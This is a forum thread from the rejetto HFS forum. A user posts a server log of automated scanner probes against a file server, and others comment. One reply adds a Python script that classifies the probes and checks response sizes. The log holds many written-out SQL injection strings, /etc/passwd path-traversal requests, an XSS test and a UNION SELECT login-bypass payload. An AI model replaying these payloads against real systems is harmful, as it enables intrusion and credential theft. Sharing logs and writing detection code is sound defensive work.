rejetto forum

SQL database Hack Attempt

jerome

  • Guest
Hello,
Be careful if you use a SQL database; I received some hacking requests on HFS 179.
I don't use macros or a SQL database, but if you use one, maybe this can help you.

If you are learning hacking, also... ;D
Code:
Requested GET /home/
Fully downloaded - 27 B @ 0 KB/s - /home/
Requested GET /~folder.tar
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar
Requested GET /?ho+{COMPLETE_VERSION}
Requested GET /?cmd=Config
Requested GET /?<script>cross_site_scripting.nasl</script>
Requested GET /home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
Fully downloaded - 27 B @ 2 KB/s - /home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
Requested GET /home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
Fully downloaded - 27 B @ 2 KB/s - /home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
Requested GET /~folder.tar?recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?recursive=
Requested GET /~folder.tar?1055944474
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?1055944474
Requested GET /~folder.tar?-='UNION'&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='UNION'&recursive=
Requested GET /~folder.tar?-='+AND+'b'>'a&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='+AND+'b'>'a&recursive=
Requested GET /~folder.tar?-='&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='&recursive=
Requested GET /~folder.tar?-='&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='&recursive=
Requested GET /~folder.tar?-=+AND+1=1&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=+AND+1=1&recursive=
Requested GET /~folder.tar?-='&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='&recursive=
Requested GET /~folder.tar?-='"&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='"&recursive=
Requested GET /~folder.tar?-=+AND+1=1)&recursive=
Fully downloaded - 512 B @ 16 KB/s - /~folder.tar?-=+AND+1=1)&recursive=
Requested GET /~folder.tar?-='&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='&recursive=
Requested GET /~folder.tar?-=9,+9,+9&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-=9,+9,+9&recursive=
Requested GET /~folder.tar?-=/**/&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=/**/&recursive=
Requested GET /~folder.tar?-='&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='&recursive=
Requested GET /~folder.tar?-='bad_bad_value&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='bad_bad_value&recursive=
Requested GET /~folder.tar?-=bad_bad_value'&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=bad_bad_value'&recursive=
Requested GET /~folder.tar?-='+OR+'&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='+OR+'&recursive=
Requested GET /~folder.tar?-='WHERE&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='WHERE&recursive=
Requested GET /~folder.tar?-=;&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-=;&recursive=
Requested GET /~folder.tar?-='OR&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='OR&recursive=
Requested GET /~folder.tar?-='
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='
Requested GET /~folder.tar?-=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=
Requested GET /~folder.tar?-='
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='
Requested GET /~folder.tar?-=')
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=')
Requested GET /~folder.tar?-=char(39)&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-=char(39)&recursive=
Requested GET /~folder.tar?-='&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='&recursive=
Requested GET /~folder.tar?-='+OR+1=1)&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='+OR+1=1)&recursive=
Requested GET /~folder.tar?-='+OR+1=1))&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='+OR+1=1))&recursive=
Requested GET /~folder.tar?-='+OR+1=1#&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='+OR+1=1#&recursive=
Requested GET /~folder.tar?-='+OR+1=1)#&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='+OR+1=1)#&recursive=
Requested GET /~folder.tar?-='+OR+1=1))#&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='+OR+1=1))#&recursive=
Requested GET /~folder.tar?-=&#39;+OR+&#39;a&#39;<&#39;b&recursive=
Fully downloaded - 512 B @ 16 KB/s - /~folder.tar?-=&#39;+OR+&#39;a&#39;<&#39;b&recursive=
Requested GET /~folder.tar?-=&#39;)+OR+(&#39;a&#39;<&#39;b&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&#39;)+OR+(&#39;a&#39;<&#39;b&recursive=
Requested GET /~folder.tar?-=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;)/*&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;)/*&recursive=
Requested GET /~folder.tar?-=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;))/*&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;))/*&recursive=
Requested GET /~folder.tar?-='+or+1=1/*&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='+or+1=1/*&recursive=
Requested GET /~folder.tar?-='+or+1=1)/*&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='+or+1=1)/*&recursive=
Requested GET /~folder.tar?-='+or+1=1))/*&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-='+or+1=1))/*&recursive=
Requested GET /~folder.tar?-=--+&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=--+&recursive=
Requested GET /~folder.tar?-=#&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=#&recursive=
Requested GET /~folder.tar?-=/*&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=/*&recursive=
Requested GET /~folder.tar?-="&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-="&recursive=
Requested GET /~folder.tar?-="&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-="&recursive=
Requested GET /~folder.tar?-=%27&recursive=
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=%27&recursive=
Requested GET /~folder.tar?-='+convert(int,convert(varchar,0x7b5d))+'&recursive=
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-='+convert(int,convert(varchar,0x7b5d))+'&recursive=
Requested GET /~folder.tar?-=convert(int,convert(varchar,0x7b5d))&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=convert(int,convert(varchar,0x7b5d))&recursive=
Requested GET /~folder.tar?-='+convert(varchar,0x7b5d)+'&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='+convert(varchar,0x7b5d)+'&recursive=
Requested GET /~folder.tar?-=convert(varchar,0x7b5d)&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=convert(varchar,0x7b5d)&recursive=
Requested GET /~folder.tar?-='+convert(int,convert(varchar,0x7b5d))+'&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='+convert(int,convert(varchar,0x7b5d))+'&recursive=
Requested GET /~folder.tar?-='+convert(varchar,0x7b5d)+'&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-='+convert(varchar,0x7b5d)+'&recursive=
Requested GET /~folder.tar?-=convert(int,convert(varchar,0x7b5d))&recursive=
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=convert(int,convert(varchar,0x7b5d))&recursive=
Requested GET /~folder.tar?-=convert(varchar,0x7b5d)&recursive=
Fully downloaded - 512 B @ 11 KB/s - /~folder.tar?-=convert(varchar,0x7b5d)&recursive=
Requested GET /~folder.tar?recursive=
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?recursive=
Requested GET /~folder.tar?1055944474
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?1055944474
Requested GET /~folder.tar?-=&recursive='UNION'
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='UNION'
Requested GET /~folder.tar?-=&recursive='+AND+'b'>'a
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+AND+'b'>'a
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive=+AND+1=1
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-=&recursive=+AND+1=1
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive='"
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='"
Requested GET /~folder.tar?-=&recursive=+AND+1=1)
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive=+AND+1=1)
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive=9,+9,+9
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=&recursive=9,+9,+9
Requested GET /~folder.tar?-=&recursive=/**/
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=/**/
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive='bad_bad_value
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='bad_bad_value
Requested GET /~folder.tar?-=&recursive=bad_bad_value'
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive=bad_bad_value'
Requested GET /~folder.tar?-=&recursive='+OR+'
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='+OR+'
Requested GET /~folder.tar?-=&recursive='WHERE
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='WHERE
Requested GET /~folder.tar?-=&recursive=;
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive=;
Requested GET /~folder.tar?-=&recursive='OR
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=&recursive='OR
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive=
Fully downloaded - 512 B @ 16 KB/s - /~folder.tar?-=&recursive=
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive=')
Fully downloaded - 512 B @ 16 KB/s - /~folder.tar?-=&recursive=')
Requested GET /~folder.tar?-=&recursive=char(39)
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=char(39)
Requested GET /~folder.tar?-=&recursive='
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='
Requested GET /~folder.tar?-=&recursive='+OR+1=1)
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='+OR+1=1)
Requested GET /~folder.tar?-=&recursive='+OR+1=1))
Fully downloaded - 512 B @ 11 KB/s - /~folder.tar?-=&recursive='+OR+1=1))
Requested GET /~folder.tar?-=&recursive='+OR+1=1#
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='+OR+1=1#
Requested GET /~folder.tar?-=&recursive='+OR+1=1)#
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+OR+1=1)#
Requested GET /~folder.tar?-=&recursive='+OR+1=1))#
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+OR+1=1))#
Requested GET /~folder.tar?-=&recursive=&#39;+OR+&#39;a&#39;<&#39;b
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=&#39;+OR+&#39;a&#39;<&#39;b
Requested GET /~folder.tar?-=&recursive=&#39;)+OR+(&#39;a&#39;<&#39;b
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive=&#39;)+OR+(&#39;a&#39;<&#39;b
Requested GET /~folder.tar?-=&recursive=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;)/*
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;)/*
Requested GET /~folder.tar?-=&recursive=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;))/*
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=&#39;)+OR+(&#39;a&#39;<&#39;b&#39;))/*
Requested GET /~folder.tar?-=&recursive='+or+1=1/*
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+or+1=1/*
Requested GET /~folder.tar?-=&recursive='+or+1=1)/*
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+or+1=1)/*
Requested GET /~folder.tar?-=&recursive='+or+1=1))/*
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+or+1=1))/*
Requested GET /~folder.tar?-=&recursive=--+
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=&recursive=--+
Requested GET /~folder.tar?-=&recursive=#
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive=#
Requested GET /~folder.tar?-=&recursive=/*
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=/*
Requested GET /~folder.tar?-=&recursive="
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive="
Requested GET /~folder.tar?-=&recursive="
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=&recursive="
Requested GET /~folder.tar?-=&recursive=%27
Fully downloaded - 512 B @ 17 KB/s - /~folder.tar?-=&recursive=%27
Requested GET /~folder.tar?-=&recursive='+convert(int,convert(varchar,0x7b5d))+'
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='+convert(int,convert(varchar,0x7b5d))+'
Requested GET /~folder.tar?-=&recursive=convert(int,convert(varchar,0x7b5d))
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=convert(int,convert(varchar,0x7b5d))
Requested GET /~folder.tar?-=&recursive='+convert(varchar,0x7b5d)+'
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=&recursive='+convert(varchar,0x7b5d)+'
Requested GET /~folder.tar?-=&recursive=convert(varchar,0x7b5d)
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=convert(varchar,0x7b5d)
Requested GET /~folder.tar?-=&recursive='+convert(int,convert(varchar,0x7b5d))+'
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive='+convert(int,convert(varchar,0x7b5d))+'
Requested GET /~folder.tar?-=&recursive='+convert(varchar,0x7b5d)+'
Fully downloaded - 512 B @ 16 KB/s - /~folder.tar?-=&recursive='+convert(varchar,0x7b5d)+'
Requested GET /~folder.tar?-=&recursive=convert(int,convert(varchar,0x7b5d))
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=convert(int,convert(varchar,0x7b5d))
Requested GET /~folder.tar?-=&recursive=convert(varchar,0x7b5d)
Fully downloaded - 512 B @ 32 KB/s - /~folder.tar?-=&recursive=convert(varchar,0x7b5d)
Requested GET /?Mode=debug
Requested GET /?Mode=debug
Requested GET /?mod=read&id=../../../../../../../../../../../../../etc/passwd
8:18:23 AM 87.202.10.179:21637 Requested GET /
Requested GET /?user=jffnms_user_sql_injection.nasl' UNION SELECT 2,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'/*&file=index&pass=
Requested GET /home
8:18:42 AM 87.202.10.179:21840 Fully downloaded - 27 B @ 2 KB/s - /home

A Greek IP asking for a Korean translation, welcome to the web joke channel.


MarkV
What a mess. IPs can be spoofed, though. The attacker very likely uses a proxy network like TOR to hide his identity.
http://worldipv6launch.org - The world is different now.


Giant Eagle
Don't worry, every attempt was a fail

HFS has no such thing as a database
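
The log posted at the top of the thread lets you check this from the response sizes: every probed `/~folder.tar` request came back at 512 B whatever the payload. The following is an added example (not part of any post and not HFS code) that parses lines in that log format, labels probe types, and flags paths whose response size changed under probing. The regex rules and function names are assumptions chosen for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Excerpt of the log posted above (HFS log format), embedded so this runs offline.
SAMPLE_LOG = """\
Requested GET /home/
Fully downloaded - 27 B @ 0 KB/s - /home/
Requested GET /?<script>cross_site_scripting.nasl</script>
Requested GET /home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
Fully downloaded - 27 B @ 2 KB/s - /home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
Requested GET /~folder.tar?recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?recursive=
Requested GET /~folder.tar?-='+OR+1=1#&recursive=
Fully downloaded - 512 B @ 0 KB/s - /~folder.tar?-='+OR+1=1#&recursive=
Requested GET /~folder.tar?-=convert(varchar,0x7b5d)&recursive=
Fully downloaded - 512 B @ 34 KB/s - /~folder.tar?-=convert(varchar,0x7b5d)&recursive=
"""

RULES = {  # heuristic signatures (assumed), applied to the URL-decoded query string
    "traversal": re.compile(r"\.\./"),
    "xss": re.compile(r"<script", re.I),
    "sqli": re.compile(r"['\"]|\b(union|select|where|and|or)\b|--|/\*|#|char\(|convert\(", re.I),
}
REQ = re.compile(r"Requested GET (\S.*)$")
DONE = re.compile(r"Fully downloaded - (\d+) B @ .*? - (\S.*)$")

def classify(url):
    """Return the set of probe labels matching the query part of a URL."""
    query = unquote_plus(url.partition("?")[2])
    return {name for name, rx in RULES.items() if rx.search(query)}

def summarize(log):
    """Per path: probe counts by label and the set of response sizes seen."""
    out = defaultdict(lambda: {"probes": defaultdict(int), "sizes": set()})
    for line in log.splitlines():
        if m := REQ.search(line):
            path = m.group(1).partition("?")[0].rstrip("/") or "/"
            for label in classify(m.group(1)):
                out[path]["probes"][label] += 1
        elif m := DONE.search(line):
            path = m.group(2).partition("?")[0].rstrip("/") or "/"
            out[path]["sizes"].add(int(m.group(1)))
    return out

def payload_sensitive(summary):
    """Paths that were probed AND answered with more than one response size."""
    return sorted(p for p, s in summary.items() if s["probes"] and len(s["sizes"]) > 1)
```

An empty result from `payload_sensitive` means no probed path answered differently by size, which is a triage signal rather than proof; a path that does appear there is where to look first.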


Fysack
I believe this is what they call an SQL injection. Guessing their way in, based upon the different error messages received. Of course this has nothing to do with HFS, HFS is fucking bulletproof man, hehe  8)
GOD CAN READ YOUR MIND


xinnv
IIS write, use the HTTP protocol!
You can use GET, POST, etc.